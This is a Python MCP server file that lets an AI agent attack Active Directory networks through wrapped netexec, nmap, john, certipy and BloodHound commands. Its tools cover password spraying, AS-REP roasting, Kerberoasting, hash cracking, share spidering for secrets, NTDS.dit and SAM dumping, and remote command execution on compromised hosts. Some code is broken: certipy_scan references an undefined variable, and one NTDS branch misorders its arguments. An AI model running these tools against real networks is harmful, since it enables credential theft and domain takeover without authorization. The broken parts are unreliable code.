import asyncio
import json
import logging
from typing import Any, Dict, List, Optional,Union
import aiohttp
from mcp.server.fastmcp import FastMCP
import re
import subprocess
from pathlib import Path
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
import os
from datetime import datetime, date, time, timezone
import csv
import time
import requests
import hmac
import hashlib
import base64
from pentestmcp import config
config.load_variables()
from pentestmcp import bloodhound
def run_command(command: List[str], timeout: int = 150,communicate:bool=False) -> Dict[str, Union[str, int, bool]]:
try:
logger.info(f"communicate :{communicate}")
logger.info(f"Running command: {' '.join(command)}")
if communicate:
# Use Popen for interactive communication
process = subprocess.Popen(
command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
text=True
)
stdout, stderr = process.communicate(input="y\n", timeout=timeout)
returncode = process.returncode
else:
# Use run for non-interactive commands
result = subprocess.run(
command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True,
check=True,
timeout=timeout
)
stdout = result.stdout
stderr = result.stderr
returncode = result.returncode
logger.info(f"Command completed with return code {returncode}")
return {
"success": True,
"stdout": stdout,
"stderr": stderr,
"returncode": returncode
}
except subprocess.CalledProcessError as e:
logger.error(f"Command failed with return code {e.returncode}: {e.stderr}")
return {
"success": False,
"stdout": e.stdout,
"stderr": e.stderr,
"returncode": e.returncode,
"error": f"Command failed with return code {e.returncode}"
}
except subprocess.TimeoutExpired as e:
logger.error(f"Command timed out after {timeout} seconds")
return {
"success": False,
"error": f"Command timed out after {timeout} seconds"
}
except Exception as e:
logger.error(f"Error running command: {str(e)}")
return {
"success": False,
"error": str(e)
}
def save_file(directory: str, filename: str, content: str) -> bool:
try:
if not directory or not filename:
raise ValueError("Directory and filename cannot be empty")
if not isinstance(content, str):
raise ValueError("Content must be a string")
dir_path = Path(directory)
dir_path.mkdir(parents=True, exist_ok=True)
file_path = dir_path / filename
with open(file_path, 'w', encoding='utf-8') as file:
file.write(content)
print(f"File saved successfully: {file_path}")
return True
except Exception as e:
print(f"Error saving file: {str(e)}")
return False
mcp = FastMCP("ACTIVE DIRECTORY MCP")
@mcp.tool(name="save_partial_finding",description="save partial findings for later use (like open ports, used protocols, versions etc.) if finding data is too long or already exists in another file dont save it")
def save_partial_finding(filename: str,content: str):
os.makedirs(config.PROJECT_DIRECTORY, exist_ok=True)
save_file(config.PROJECT_DIRECTORY, filename, content)
@mcp.tool(name="get_project_directory_files", description="read existing files from the project directory to see what findings and data have been saved")
def get_project_directory_files():
try:
project_path = Path(config.PROJECT_DIRECTORY)
if not project_path.exists():
return f"Project directory does not exist: {project_path}"
if not project_path.is_dir():
return f"Project path is not a directory: {project_path}"
files_info = []
for item in project_path.iterdir():
stat = item.stat()
file_type = "DIR" if item.is_dir() else "FILE"
size = stat.st_size
modified = datetime.fromtimestamp(stat.st_mtime).strftime("%Y-%m-%d %H:%M:%S")
files_info.append(f"{file_type:<4} {size:>8} {modified} {item.name}")
if not files_info:
return f"Project directory is empty: {project_path}"
header = f"Contents of {project_path}:\nTYPE SIZE MODIFIED NAME\n" + "-"*50
return header + "\n" + "\n".join(files_info)
except Exception as e:
return f"Error reading project directory: {str(e)}"
@mcp.tool(name='read_files', description="read a file")
def read_files(path: str | Path) -> str | None:
try:
if not path:
raise ValueError("Path cannot be empty")
file_path = Path(path).expanduser()
if not file_path.is_file():
raise FileNotFoundError(f"File does not exist: {file_path}")
with file_path.open('r', encoding='utf-8') as file:
content = file.read()
print(f"File read successfully: {file_path}")
return content
except Exception as e:
print(f"Error reading file: {e}")
return None
@mcp.tool(name="check_SMB_signing",description="used to check smb signgings of an ip address or some range of ip addresses with the needed options")
def check_SMB_signing(ips:List[str]):
return run_command(["netexec","smb"]+ips)
@mcp.tool(name="run_nmap_scan",description="run an nmap scan on an ip or ip range (use the right nmap flags based on the first response)")
async def run_nmap_scan(ips:List[str],flags:List[str]):
return run_command(["nmap","-sV","-v"]+flags+ips)
@mcp.tool(name="generate_pwd_wordlist",description="generate some password wordlist based on initial input of word(s), let this be the last resort if no other wordlist worked")
def generate_pwd_wordlist(inp:List[str]):
return run_command([
"python",
str(Path(__file__).parent.resolve()/"psudohash/psudohash.py"),
"-w",
",".join(inp),
"-cpa",
"-q",
"-o",
config.PROJECT_DIRECTORY+"/passwords/"+inp[0].strip()+".txt",
"--minlen",
"10",
"--maxlen",
"13",
"--max-combine",
"2"],
communicate=True)
@mcp.tool(name="enumerate_domain_users",description="enumerate users on an active directory domain, you can provide username or password if you have some")
def enumerate_domain_users(ips:List[str],username="",password=""):
if len(username)>0:
if len(password)>0:
return run_command(["netexec","smb"]+ips+["-u",username,"-p",password,"--users"])
return run_command(["netexec","smb"]+ips+["-u",username,"--users"])
return run_command(["netexec","smb"]+ips+["--users"])
@mcp.tool(name="bruteforce_rid_users",description="Bruteforce rid to enumerate users")
def bruteforce_rid_users(ips:List[str]):
return run_command(["netexec","smb"]+ips+["--rid-brute"])
@mcp.tool(name="password_spray",description="spray passwords on an account or several accounts")
def password_spray(ips:List[str],usernames:List[str],passwords:List[str],onelogin:bool=False):
if(onelogin):
return run_command(["netexec","smb"]+ips+["-u"]+usernames+["-p"]+passwords+["--no-bruteforce","--continue-on-success"])
return run_command(["netexec","smb"]+ips+["-u"]+usernames+["-p"]+passwords)
@mcp.tool(name="ASREPRoast",description="Retrieve the Kerberos 5 AS-REP etype 23 hash of users without or with Kerberos pre-authentication required ")
def ASREPRoast(ips:List[str],usernames,passwords):
if len(passwords)>0:
return run_command(["netexec","ldap"]+ips+["-u",usernames,"-p",passwords,"--asreproast",config.PROJECT_DIRECTORY+"/hashes.txt"])
return run_command(["netexec","ldap"]+ips+["-u",usernames,"--asreproast",config.PROJECT_DIRECTORY+"/hashes.txt"])
@mcp.tool(name="Kerberoast",description="The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts. Thus, part of these TGS tickets is encrypted with keys derived from user passwords. As a consequence, their credentials could be cracked offline.")
def kerberoast(ips:List[str],usernames,passwords,output_file:str):
output_file=config.PROJECT_DIRECTORY+output_file
if len(passwords)>0:
return run_command(["netexec","ldap"]+ips+["-u",usernames,"-p",passwords,"--kerberoast",output_file])
return run_command(["netexec","ldap"]+ips+["-u",usernames,"--kerberoast",output_file])
@mcp.tool(name="get_john_formats",description="check available john format before cracking a hash")
async def get_john_formats():
return run_command(["john","--list=formats"])
@mcp.tool(name="john_the_ripper",description="cracking hashes using john based on format and a wordlist")
async def john_the_ripper(hashfile:str,format:str,wordlist:str="/usr/share/wordlists/rockyou.txt"):
return run_command(["john",f"--format={format}",hashfile,f"--wordlist={wordlist}"])
@mcp.tool(name="spider_smb_shares",description="enumerate smb shares having username and password credentials and dump them into ~/.nxc/modules/nxc_spider_plus/{ip}.json and you'll find the directory inside ~/.nxc/modules/nxc_spider_plus/{ip} that has the data so you could read that. read readable files after you check what files exists and pull valuable information like old versions , hard coded secrets , misconfigurations .. If you see items listed in the share but didn't get downloaded raise the max_size and download again.")
def spider_smb_shares(ips:List[str],username:str,password:str,ntlm:bool=False,kerberos:bool=False,max_size="100000"):
if(ntlm):
return run_command(["netexec","smb"]+ips+["-u",username,"-H",password,"-M","spider_plus","-o","DOWNLOAD_FLAG=True",f"MAX_FILE_SIZE={max_size}"])
elif(kerberos):
return run_command(["netexec","smb"]+ips+["-u",username,"-p",password,'-k',"-M","spider_plus","-o","DOWNLOAD_FLAG=True",f"MAX_FILE_SIZE={max_size}"])
return run_command(["netexec","smb"]+ips+["-u",username,"-p",password,"-M","spider_plus","-o","DOWNLOAD_FLAG=True",f"MAX_FILE_SIZE={max_size}"])
@mcp.tool(name="dump_ntds_dit",description="dump NTdS.dit which contains users and their hashes if we have some valid credentials")
def dump_ntds_dit(ips:List[str],username:str,password:str,ntlm:bool=False,kerberos:bool=False):
if(ntlm):
return run_command(["netexec","smb"]+ips+["-u",username,"-H",password,"--ntds"],communicate=True)
elif(kerberos):
return run_command(["netexec","smb"]+ips+["-u",username,"-p",'-k',password,"--ntds"],communicate=True)
else:
return run_command(["netexec","smb"]+ips+["-u",username,"-p",password,"--ntds"],communicate=True)
@mcp.tool(name="command_execution",description="execute powershell commands if we have pwned the user, possible to use ntlm or password for authentication")
def command_execution(ips:List[str],username:str,password:str,command:str,ntlm:bool=False,kerberos:bool=False):
if (ntlm):
return run_command(["netexec","smb"]+ips+["-u",username,"-H",password,"-x",command])
elif(kerberos):
return run_command(["netexec","smb"]+ips+["-u",username,"-p",password,'-k',"-x",command])
else:
return run_command(["netexec","smb"]+ips+["-u",username,"-p",password,"-x",command])
@mcp.tool(name="dump_sam_hashes",description="dump sam hashes if we have some redentials using the sec dump which is similar to secretdump,use ntlm hash or normal password")
def dump_sam_hashes(ips:List[str],username:str,password:str,ntlm:bool=False,kerberos:bool=False):
if (ntlm):
return run_command(["netexec","smb"]+ips+["-u",username,"-H",password,"--sam","secdump"])
elif(kerberos):
return run_command(["netexec","smb"]+ips+["-u",username,"-p",password,'-k',"--sam","secdump"])
else:
return run_command(["netexec","smb"]+ips+["-u",username,"-p",password,"--sam","secdump"])
@mcp.tool(name="bloodhound_ingest",description="use the netexec's bloodhound feature to extract the json data to be uploaded to bloodhound database")
def bloodhound_ingest(ips:List[str],username:str,password:str,ntlm:bool=False,kerberos:bool=False):
if (ntlm):
return run_command(["netexec","ldap"]+ips+["-u",username,"-H",password,"--bloodhound","--collection","all"])
elif(kerberos):
return run_command(["netexec","ldap"]+ips+["-u",username,"-p",password,'-k',"--bloodhound","--collection","all"])
else:
return run_command(["netexec","ldap"]+ips+["-u",username,"-p",password,"--bloodhound","--collection","all"])
@mcp.tool(name="check_module",description="Call this before before using a module to check available exploit modules for a certain netexec supported protocol {rdp,ldap,winrm,smb,ssh,nfs,ftp,wmi,mssql,vnc} and based on the description of the modules chose one to perform")
def check_module(prot:str):
return run_command(["netexec",prot,'-L'])
@mcp.tool(name='check_options',description='After selecting the right module call this to check what options that module presents')
def check_options(prot:str,module:str):
return run_command(["netexec",prot,'-M',module,'--options'])
@mcp.tool(name='use_module',description='Call this to use the module with the right options and make sure to satisfy the need of certain variables like credentials etc.If no credentials are needed for the module or no valid credentials are found leave the username and password default (empty). Options syntax is ["option1=value1","options2=value2",...]')
def use_module(ips:List[str],prot:str,module:str,options:List[str],username:str,password:str,kerberos:bool=False,ntlm:bool=False):
if (ntlm):
return run_command(["netexec",prot]+ips+["-u",username,"-H",password,"-M",module,"-o"]+options)
elif(kerberos):
return run_command(["netexec",prot]+ips+["-u",username,"-p",password,'-k',"-M",module,"-o"]+options)
else:
return run_command(["netexec",prot]+ips+["-u",username,"-p",password,"-M",module,"-o"]+options)
@mcp.tool(name="test_bloodhound_connection",description="connect to bloodhoundapi and get version")
def test_bloodhound_connection():
return bloodhound.connectToApi()
@mcp.tool(name="upload_zip_to_bloodhound",description="Upload data zip to bloodhound to ingest and analyze (wait until it gets ingested before testing queries)")
def upload_zip_to_bloodhound(zip_path):
return bloodhound.upload_zip(zip_path)
@mcp.tool(name="list_saved_quereis",description="list already saved queries in bloodhound")
def list_saved_queries():
return bloodhound.list_saved_queries()
@mcp.resource("data://bloodhound_cypher_queries")
def get_custom_queries():
# Resolve path relative to this script (safer than relying on current working dir)
p = Path(__file__).parent / "ressources/custom_bloodhound_queries.json"
# use 'encoding' (not 'encode') and json.load for file -> python object
with p.open("r", encoding="utf-8") as f:
return json.load(f)
@mcp.tool(name="run_blooodhound_query",description="Run a bloodhound cypher query of your choice (use this to collect information about the network and potentially identify attack vectors)")
def run_bloodhound_query(query):
return bloodhound.run_cypher_query(query)
@mcp.tool(name="certipy_scan",description="Call this to enumerating Active Directory Certificate Services (AD CS) vulnerabilities. username syntax is: username@domain")
def certipy_scan(ip:str,username:str,password:str,ntlm:bool=False,kerberos:bool=False):
if ntlm:
return run_command(["certipy","find","-vulnerable","-u", user ,"-hashes",password,"-dc-ip",ip,"-stdout"])
if kerberos:
return run_command(["certipy","find","-vulnerable","-u", user ,"-k","-p",password,"-dc-ip",ip,"-stdout"])
return run_command(["certipy","find","-vulnerable","-u", user ,"-p",password,"-dc-ip",ip,"-stdout"])
def main():
mcp.run()
if __name__ == "__main__":
main()